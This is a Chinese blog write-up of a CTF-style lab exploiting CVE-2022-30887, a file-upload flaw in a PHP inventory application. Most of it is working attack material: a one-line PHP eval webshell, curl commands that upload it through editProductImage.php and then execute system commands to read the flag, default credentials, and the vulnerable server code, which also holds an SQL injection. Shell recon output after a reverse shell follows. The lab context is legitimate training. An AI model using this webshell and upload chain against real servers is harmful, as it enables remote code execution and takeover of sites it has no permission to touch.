i春秋云镜CVE-2022-30887

安河桥北2025

已于 2023-04-29 19:11:04 修改

阅读量358

点赞数

文章标签： php 开发语言

于 2023-04-29 18:47:21 首次发布

本文链接：https://blog.csdn.net/qq_29060627/article/details/130442754

版权

登录界面的密码是(虽然用不着登录):

email：mayuri.infospace@gmail.com
passwd：mayurik

开bp (BurpSuite) ,默认代理tcp 8080:

curl -v -x http://127.0.0.1:8080/ http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/login.php

C:\Users\Administrator>type z:\999.php
<?=eval($_POST[9]);
C:\Users\Administrator>

curl -v -F "productImage=@z:/999.php" -F "btn=1" -x http://127.0.0.1:8080/ http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/php_action/editProductImage.php?id=1

get flag:

curl -v -d "9=system('cat /flag');" http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/assets/myimages/999.php

flag{027c354b-32db-449e-a92f-0f9e3472bf8c}

/var/www/html/php_action/editProductImage.php

<?php 	

require_once 'core.php';

//$valid['success'] = array('success' => false, 'messages' => array());
$productId = $_GET['id'];

if($_POST) {		

$image = $_FILES['productImage']['name'];
$target = "../assets/myimages/".basename($image);

if (move_uploaded_file($_FILES['productImage']['tmp_name'], $target)) {
 // @unlink("uploadImage/Profile/".$_POST['old_image']);
	//echo $_FILES['image']['tmp_name'];
	//cho $target;exit;
      $msg = "Image uploaded successfully";
      echo $msg;
    }
    else{
      $msg = "Failed to upload image";
      echo $msg;exit;
    }		
			

				$sql = "UPDATE product SET product_image = '$image' WHERE product_id = $productId";				
//echo $sql;exit;
				if($connect->query($sql) === TRUE) {									
					$valid['success'] = true;
					$valid['messages'] = "Successfully Updated";
					header('location:../product.php');
				} 
				else {
					$valid['success'] = false;
					$valid['messages'] = "Error while updating product image";
				}
			// /else	
		
	$connect->close();

	echo json_encode($valid);
 
} // /if $_POST
?>

反弹一个shell:

www-data@engine-2:/tmp$ uname  -a
Linux engine-2 4.19.91-20220519040629.182dd72.al7.x86_64 #1 SMP Thu May 19 04:09:16 UTC 2022 x86_64 GNU/Linux
www-data@engine-2:/tmp$

www-data@engine-2:/tmp$ curl  cip.cc
IP	: 39.106.20.178
地址	: 中国  北京
运营商	: 阿里云/电信/联通/移动/铁通/教育网

数据二	: 北京市 | 阿里云

数据三	: 中国北京北京市 | 阿里云

URL	: http://www.cip.cc/39.106.20.178
www-data@engine-2:/tmp$

www-data@engine-2:/tmp$ df -h
Filesystem      Size  Used Avail Use% Mounted on
overlay          30G  9.0G   20G  33% /
tmpfs            64M     0   64M   0% /dev
tmpfs           336M     0  336M   0% /sys/fs/cgroup
/dev/vda         30G   56M   28G   1% /etc/hosts
kataShared       19G   14G  4.0G  78% /etc/resolv.conf
shm              63M     0   63M   0% /dev/shm
www-data@engine-2:/tmp$ free -m
              total        used        free      shared  buff/cache   available
Mem:            670         165         114           0         391         435
Swap:             0           0           0
www-data@engine-2:/tmp$

www-data@engine-2:/tmp$ php -v
PHP 7.2.20 (cli) (built: Jul 12 2019 23:33:38) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
www-data@engine-2:/tmp$